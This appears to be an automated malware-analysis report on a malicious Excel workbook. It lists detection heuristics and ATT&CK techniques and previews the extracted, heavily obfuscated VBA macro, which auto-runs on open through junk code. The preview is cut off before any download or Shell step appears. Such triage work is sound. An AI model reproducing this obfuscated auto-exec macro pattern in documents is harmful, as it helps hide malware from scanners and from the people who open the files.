Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
This Excel document contains obfuscated VBA macros that are triggered by the Workbook_Open event. The macros utilize Shell() and CreateObject() calls, indicating an intent to execute arbitrary code. The primary function appears to be downloading and executing a second-stage payload, though the specific payload and its destination are not directly discernible from the provided obfuscated script.
Heuristics (6)
- VBA macros detected (medium, 4 related findings): OLE_VBA_MACROS. Document contains VBA macro code.
- Shell() call in VBA (critical): OLE_VBA_SHELL. Shell() call in VBA.
- Workbook_Open macro (high): OLE_VBA_WBOPEN. Workbook_Open macro.
- CreateObject call (high): OLE_VBA_CREATEOBJ. CreateObject call.
- VBA p-code auto-exec with execution tokens (high): OLE_VBA_PCODE_AUTOEXEC_EXEC. Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info): EXTRACTED_FILE_STATIC_TRIAGE. One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15884 bytes |

SHA-256: 80ae821ed77b3c045b205b5d3ee00e69e54d91a87fd3c6f0a8fd994c2ffee173
Detection: ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 4 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
EsnBOcAXzEqOM.leewl3ElmMbJRP8Q1sVf
While 25 = 554
Dim zv7nF7RKrc_hXyifjIrZltr8tsMM31EoN4Ozgzpnj43HH3vc As Variant
Wend
Dim qZqq_63EC8 As Integer
While 8 = 8567
Dim VsDQ1WXSdhr9scCzrziyz7sfbIXnR_ As Variant
Wend
Dim Ivi6R5fkBt As Integer
While 15 = 399
Dim tiP58a7L7EJNcHCY9fyp9s_cX6XwJGSEwxDPoxg_LKqLy4QY32 As Variant
Wend
Dim uUt_hweBBIAxv As Integer
While 3 = 9377
Dim DanDutI9xbwAwmcm84RKSTaDDq1Qe7CI2YubmUFFu_6278uHB As Variant
Wend
Dim XCNqlas9j_D2 As Integer
While 20 = 8776
Dim b1YlHV2__lvJYSWhE_6rOF4waN8AbBUCN3f_bSyWOAWZbfLF As Variant
Wend
Dim TZd4FIkU6lI3 As Integer
While 20 = 4955
Dim X1g7Ps6fwQEuOgaNrcT5BzoBgZ5DQJGyH69XcZHrjpS As Variant
Wend
Dim CTrniqUlbQNzgJd As Integer
While 23 = 2751
Dim Yyx1MlHOkShBtQSkSUflqxvUV5gog4_ZM8_R3saq3DET_nkTHo4dAgwjCbc As Variant
Wend
Dim RDcqqMFxvQ As Integer
While 18 = 4756
Dim Aqj3xslqaTqSKf29iYpJXOZNHlXUXE3 As Variant
Wend
Dim zyCG7SjKwJ2jFv As Integer
While 23 = 5224
Dim yqnpGk2tPUtJSORUazdHX5o8M29enRaIt As Variant
Wend
Dim afpZKrMIVp8z As Integer
While 10 = 2462
Dim c4iNo6crh4BobOkUE73jZ2sl4OGP8ANpGLW_6XmeoB2lm As Variant
Wend
Dim tsakxOrDNik As Integer
While 17 = 6369
Dim J7SYwLtfoTgN1eYpRW4W9E8HfonItel2mv49_MqaQT7QLcjEWiX As Variant
Wend
Dim pTJkD8J2Fhiu As Integer
While 2 = 2738
Dim HrnkDkZk_oaEmHo5B_huJE5gaJy_3Ti3qiwih1ec77 As Variant
Wend
Dim S_2_75QNyB_x As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "EsnBOcAXzEqOM"
Dim QV91Cr7RUw_t89QUllnbhTYWVk8v_CShapQilhOWXHpUcQcc9_ As String
Function jBvEI3vYqs_hXDTEVJhDwLv5oUL4q(qaQWHQV7ZkDdU1BeBdp67PGJApMLWXHiM9C6uyAWi7XDaCW1YRnIj6lZSEUaCHiBbcPVx_sKb)
While 16 = 8235
Dim tmohretdT23tIL5aB_gR7F2VSwwWDAZc2y As Variant
Wend
Dim rEBppWBLUe As Integer
While 13 = 3755
Dim gWLrrbaZ9ytmtQN5qVZSaY1ScxXTXHPttVy6i_ As Variant
Wend
Dim okh_cB__Tsauoov As Integer
While 2 = 7897
Dim ACGf2N3CFByh_2WbQTlpxua5xNWbn3lcj As Variant
Wend
Dim sRpYpyvgZ8nc_K7 As Integer
Dim Xv_odUKJvqlnwkjcg_NGmaZT3_e5JwFUjlDIg4DkoDKt7_FXFbKpW4X7TovcyP_8iOCJgZ6l6maiOoW33FxqjZ8pLEx1FiuXDLJp65zofhssbxqoQ3j
While 15 = 8616
Dim PHYC87OkLqmzZXMXU8AHDv2mv4OScPTIJeWsKYlAbqcqC As Variant
Wend
Dim THKhQdCC2c As Integer
While 9 = 8639
Dim OvODp5F6Vbn5_dK5U_oVQJjvhFG48yFGl3bYHg As Variant
Wend
Dim SgigTjSYHq As Integer
While 12 = 4111
Dim UUHBWeJ_KcdiwL7fUfQFAvvwoFvty9bG8YgloDsFqVMoBttViwM As Variant
Wend
Dim wGAphiUVOrZOK_V As Integer
Dim gDtsfqatlZAEXHg7hCrbr2GeSm2GYEyrlRkdy8zqhQ9K7WEN_2PyD7yo6MY3ySSfkRc_fBGiL_3Y35g5flGgx9nob6hjh72N8bin4Aq7tqlCC
While 20 = 148
Dim kWnT1PvIXmhEt5VYIBto_6r8BSqcXPFAnoHVqN57_8lB_ As Variant
Wend
Dim bjZ3QOLZTUon As Integer
While 20 = 2626
Dim pQfiRuGegZ_v_r5EwnARo8hrOjE_4jSRcq_6WVqLdfbBen2iSE As Variant
Wend
Dim loTU9qrxRqnF As Integer
While 3 = 4585
Dim k6FuQQq8qZ7xxHefLkqfpw7m8GrQLiC9gV4e5sVj1TXKrefyKKjq9GZ As Variant
Wend
Dim w9bvIiYuFV7O
... (truncated)